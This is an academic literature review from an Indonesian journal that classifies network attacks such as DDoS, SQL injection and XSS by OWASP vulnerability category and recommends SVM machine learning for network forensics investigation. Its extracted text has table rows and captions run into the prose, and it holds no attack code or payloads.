Network Attacks Classification for Network Forensics Investigation: Literature Reviews

Every branch of technology must constantly be on guard and anticipate the possibility of numerous cybercrimes due to the ongoing cyber-attacks. Crimes committed in this era of digitalization will undoubtedly have a negative impact on individuals or groups. In order to allow any cybercriminal to operate freely without worrying about getting caught, mitigation after a cyber-attack is often considered a trivial problem. Digital forensics not only plays an important role in the digitization cycle but is also critical to the digital industry's ability to respond to events as they occur. The standard methods used to support the pace of progress in digital forensics are very time-consuming and ineffective given the frequency of cybercrime. It is expected that collaboration between technology disciplines, such as the application of machine learning to digital forensics


Introduction
The internet is now widely used by most individuals for a variety of professional and personal tasks due to rapid technological advancements that make it easily accessible.The Internet is used for several important activities, including communication, information exchange, and economic transactions.The Internet promotes connection and communication, but attackers aiming to damage and disrupt network connections and network security can violate and jeopardize the integrity and confidentiality of connections and information exchange [1]- [5].
Network attacks are becoming more frequent over time, requiring their investigation, understanding, and development as more effective security defense technologies.Network security solutions are required for every business, sector, and level of government to protect against the increasing threat of cyberattacks.As no network is immune to network attacks, the need for more reliable and effective network security systems to protect customer and business data is increasing.
Network forensics is the collection, recording, and investigation of network events with the goal of identifying the origin of security attacks or other instances of problems.In other words, network forensics entails the collection, cataloging, and examination of network traffic.Network forensics serves to gather information, compile evidence, and identify attacks.When managing activity and traffic on the network, investigative procedures are performed.Unlike other means, network forensics deals with dynamic information that tends to be lost.The network forensics investigation process used consists of several stages consisting of nine stages referred to as the Generic Framework for Network Forensics [6]- [10].
According to a Kaspersky report, DDoS attacks are frequent and hostile every quarter, with a wide range of subjects, including politics, education, business, and others [11], [12].Amazon in February 2020, NetScout in April 2018, and GitHub in February 2018 are just a few examples of industries where the most frequent DDoS attacks have occurred [13]- [15].As seen in Figure 1 [16], [17].Attempts can be made to reduce SQL injection attacks by ensuring that the system in use is updated in every way, staying abreast of the risks, and developing strategies to anticipate them.
This paper aims to explore the latest research on attacks on computer networks.Attacks on computer networks that vary greatly are then classified and mapped.The process of classifying and mapping attacks on computer networks is proposed for future research.

Research Methods
This literature reviews collected literature studies related to attacks on computer networks as seen in Figure 2. The search process was conducted using several popular databases, such as Google Scholar and ResearchGate.Google Scholar and ResearchGate were chosen because they can find a wide range of journals and are suitable for searching in very specific research domains.The search was conducted using important keywords, such as "network attack", "network hacking", "network forensics", and "machine learning".
Collection and analysis were conducted from January to April 2023.The selection process was based on the title, abstract, purpose, and type of network attack.Scientific papers that met the selection criteria were included in the literature review.After the selection process, thirty scientific papers were included in the literature review with the theme of attacks that occur on computer networks.
Figure 2. Flowchart of the literature review of attacks on computer networks.

Results and Discussions
The results of the search conducted are mapped in Table 1 and Table 2, the mapping carried out then results in the conclusion of attack categories that often occur based on vulnerabilities in the service system.The categories of attacks that occur include DDoS, Injection, Hijacking.
Broken Access Control vulnerabilities are often used to attack from the network side.The attack is in the form of flooding access requests so that the system cannot serve users.This attack is called DDoS, in Figure 3, 4, 5 describes the types of DDoS [18]- [20].
Software and Data Integrity Failures vulnerabilities are also often exploited by attackers from the network side.This attack is more focused on the source code of the application system that is hijacked and manipulated.This is very dangerous because it has an impact on changing the function of the application system.This source code manipulation by attackers is often called Cross Site Scripting (XSS).The XSS mechanism is described in Figure 6 [21].Identification and Authentication Failures vulnerabilities are also widely utilized by attackers to carry out attacks from the network side.This attack is more focused on the data repository of a system or database.This attack is carried out by injecting payload code to illegally access the Jurnal RESTI (Rekayasa Sistem dan Teknologi Informasi) Vol.The literature reviews conducted in Table 1 and Table 2 is the result of mapping previous research related to attacks on computer networks.The studies taken are those that discuss vulnerabilities related to Broken Access Control, Software and Data Integrity Failures, and Identification and Authentication Failures.
Attack mechanisms based on the vulnerabilities mentioned include DDoS, Hijacking and Injection.The results of the search conducted are mapped in Table 1 and Table 2, the mapping carried out then results in the conclusion of attack categories that often occur based on vulnerabilities in the service system.The categories of attacks that occur include DDoS, Injection, Hijacking.Broken Access Control DoS, DDoS Flooding network traffic [24] Broken Access Control, Software and Data Integrity Failures

DoS, Injection
Flooding network traffic, inserting content not in line with service functions [25] Broken Access Control DDoS Flooding network traffic [26] Broken Access Control DDoS Flooding network traffic [27] Broken Access Control DoS Flooding network traffic [28] Broken Access Control DDoS Flooding network traffic [29] Software and Data Integrity Failures Injection Inserting content does not match the service function [20] Broken Access Control DDoS Flooding network traffic [30] Broken Access Control DoS Flooding network traffic [31] Software and Data Integrity Failures Injection Inserting content does not match the service function [32] Software and Data Integrity Failures Injection Inserting content does not match the service function [33] Software and Data Integrity Failures Injection Inserting content does not match the service function [21] Software The rapid development of the internet has forced most business organizations to follow the current trend by coming up with modern and flexible technological innovations and developments for business processes.DDoS attacks are not the only cyber-attacks that have a significant and detrimental impact.OWASP as a cybersecurity observer organization categorizes cyberattacks into several categories so that a Top 10 attack is made that informs the type of vulnerability and the impact of threats that occur on a device, so that this information can be used either by individuals or organizations to make decisions in evaluating security risks on devices that are managed [46].
Several methods have been proposed to handle and categorize network traffic attacks.First is the portbased approach, which entails selecting port numbers from those kept on file by the Internet Assign Number Authority (IANA).However, this method has proven ineffective due to the increasing number of applications and unreliable ports.In addition, this method is not applicable to applications that use dynamic port numbers or account applications that do not register their ports with IANA.Another method that has been suggested is the payload-based method, commonly known as Deep Packet Inspection (DPI), where the contents of network packets are examined and compared with a data set on a database.This method provides more accurate results than port-based techniques but does not work on network applications that use encrypted data [47]- [49].
DDoS attacks, which can prohibit authorized users from accessing network services, are one of the most frequent and dangerous forms of attacks.Servers can become the target of DDoS attacks by flooding the network with huge volumes of traffic, which can exhaust network resources.In addition, there are many devices that can connect to the Internet due to the IoT era.As a result, attackers can use many bots from different places to launch various DDoS attacks.It is difficult to identify DDoS attacks carried out using bot devices [18]- [20].
In addition, these attacks quickly exhaust network resources.A significant DDoS attack can cost some businesses up to $100,000 per hour while also eroding client trust.DDoS attacks can overload multiple levels of SDN, including the channels for communication between the controller and the application layer or between the controller and the open flow switch.SDN has a single point of failure, so if it is destroyed by a DDoS attack, the entire network will go down at once [6], [32], [33], [41], [43].
Substantial recovery costs are an additional loss for agencies due to the loss of integrity caused by cyberattacks that have occurred.Activities that damage, disrupt, steal data, and anything that harms system owners on computer networks are illegal and can be prosecuted in court.Criminals can be punished based on evidence found by network forensics mechanisms [6], [19], [23], [33], [42].Investigators commonly use network monitoring systems such as IDS for forensic purposes, where investigations are conducted using IDS logs and attack notification systems.Intrusion Detection System (IDS) works by monitoring and alerting suspicious activities that occur on the network and immediately reporting them as alerts.Most of the time, intrusion detection systems are used based on digital signatures.Due to the variation in network traffic, which results in a growing number of alerts because the data flow in the network is not stationary to generate and respond to alerts, this results in many errors in detecting attacks.Network traffic can also be viewed by analyzing network packets.Network packets are a fundamental object that can be analyzed in network forensics, this is done to collect data related to network traffic that can be used as evidence in court [21], [34], [39], [44].The main threats of injection attacks include theft of credentials, forced access to a system and violation of the integrity of stored data.The number of criminal acts in the cyber world, injection attacks are one form of attack that has a wide range of vulnerabilities, including SQL Injection, Command Injection, XSS, NoSQL Injection, LDAP Injection, and others.SQL Injection has several basic types In-band SQLi (Classic SQLi), Out-of-band SQLi and Inferential SQLi (Blind SQLi) [31], [50], [51].
The diversity of types and variations of injection attacks makes it one of the critical attacks that can cause major damage to a system, data leakage and can even cause paralysis of the system.The presence of technological innovations and developments at this time still cannot stem the attacks caused by injection vulnerabilities [52]- [54].
SQL Injection attacks perform the injection process on the target database, while XSS attacks inject code with malicious functions that are injected into a system in the form of JavaScript.Some people think that XSS attacks are not a serious threat, but in some incidents XSS attacks have impacted several major services such as PayPal (2006), Amazon (2013) and Twitter (2014).XSS attacks allow the perpetrator to perform various harmful actions including taking over accounts, installing spyware, exploiting the system further, spreading viruses/worms and even remoting the system [55], [56].
XSS attacks work through malicious code that has been inserted into a system that can infect the victim's application system or browser.The code will have various effects depending on what function the XSS code serves.Generally, XSS code is used to steal cookies, read user activity as spyware/keylogger, and spread viruses.These things are often considered not so important, however, such as cookie theft, especially if the stolen cookie is a credential cookie that can be used so that the perpetrator does not need a username/ password to access the victim's data/account [57], [58].
Like SQL Injection, XSS attacks have several types of attacks that have different impacts, namely Reflected XSS, Stored XSS and DOM Based XSS which have different threat levels.The various types of XSS attacks, methods and variants of injection models make this XSS attack a threat that needs to be watched out for, especially since there are still many systems that ignore the threat of this attack, especially in application systems [59], [60].
Machine Learning (ML) and data mining techniques play an important role in cyber-attack detection and classification.Machine learning can be a solution to create mechanisms to detect and identify new types of attacks and help investigators investigate evidence in network forensics.Several machine learning studies have been conducted in various domains of this technique providing anomaly-based intrusion detection functions on network devices.The rapid development of machine learning presents a variety of methods that can be used for various needs with the advantages and disadvantages of these methods.Support Vector Machine (SVM) is one of the machine learning algorithms that can be used in classification due to its ability to clearly classify data points by creating a hyperplane in n-dimensional space, where n represents the number of features [33], [40], [41], [43], [61].[2], [26], [28], [35], [49], [62].
The use of the Support Vector Machine (SVM) algorithm is considered to have a level of stability in the classification process and has a high accuracy value.
The amount of data that appears in the network forensic investigation process is a challenge for an investigator to find evidence related to abnormal network traffic, network communication and files.The presence of machine learning with the implementation of the SVM algorithm is expected to help the network forensic investigation process in finding evidence in the form of abnormal network traffic and evidence of attacks on a system to be more efficient and accurate.The selection of the Support Vector Machine (SVM) algorithm is based on suggestions, recommendations and results from previous studies related to the data classification process using machine learning [32], [35], [48], [49], [62], [63].

Conclusion
The literature review conducted in this study reveals a significant variation in the types of attacks perpetrated on computer networks.These attacks can be classified based on the vulnerabilities exploited by the attackers.The contribution of this literature review lies in the classification of network attacks according to their underlying vulnerabilities.Three common vulnerabilities targeted by attackers include Broken Access Control, Software and Data Integrity Failures, and Identification and Authentication Failures.Attackers often exploit these vulnerabilities to carry out attacks such as DDoS, Hijacking, and Injection.Furthermore, this literature review also offers insights into future research recommendations for classifying network attacks using machine learning algorithms.The aim is to automate the attack classification process, thereby expediting investigations.Support Vector Machine (SVM) is a suitable method for this purpose, as it has demonstrated accuracy in data classification in various previous studies.
In addition to the classification of network attacks based on vulnerabilities, future research should focus on developing proactive defense mechanisms to mitigate and prevent such attacks.This can involve the implementation of advanced intrusion detection and prevention systems that leverage machine learning algorithms to identify and respond to emerging threats in real-time.Additionally, exploring the potential of anomaly detection techniques and behavioral analysis can enhance the ability to detect and thwart sophisticated attack patterns.By investing in research and innovation in these areas, organizations can strengthen their network security posture and stay one step ahead of cybercriminals.
from Cisco's Annual Internet Report 2018-2023, DDoS attacks continue to increase year over year, Jurnal RESTI (Rekayasa Sistem dan Teknologi Informasi) Vol. 7 No. 5 (2023) DOI: https://doi.org/10.29207/resti.v7i5.5153Creative Commons Attribution 4.0 International License (CC BY 4.0) 1133 making it difficult to prevent the scale of DDoS attacks that are still occurring today, according to Kaspersky.Maintaining service resource operations, reviewing Internet service provider contracts, implementing specialized solutions such as DDoS protection, understanding network traffic, and establishing a backup defense strategy are all ways to reduce DDoS attacks.

Figure 1 .
Figure 1.Cisco DDoS Annual ReportStill common and unpredictable, injection attacks are a component of cyber-attacks.From a few years ago to the present, several cyber events have taken place.The discovery of SQL injection vulnerabilities in Cisco Prime License Manager in 2018, SQL injection in the video game Fortnite in 2019, and SQL injection attacks on the Estonian Central Health Database in 2020, which allowed the perpetrators to access the medical records of almost all Estonian citizens, are just a few of the incidents that have occurred in recent years[16],[17].Attempts can be made to reduce SQL injection attacks by ensuring that the system in use is updated in every way, staying abreast of the risks, and developing strategies to anticipate them.

Table 1 .
Summary of Literature Reviews

Table 2 .
Summary of Literature Reviews (Continued)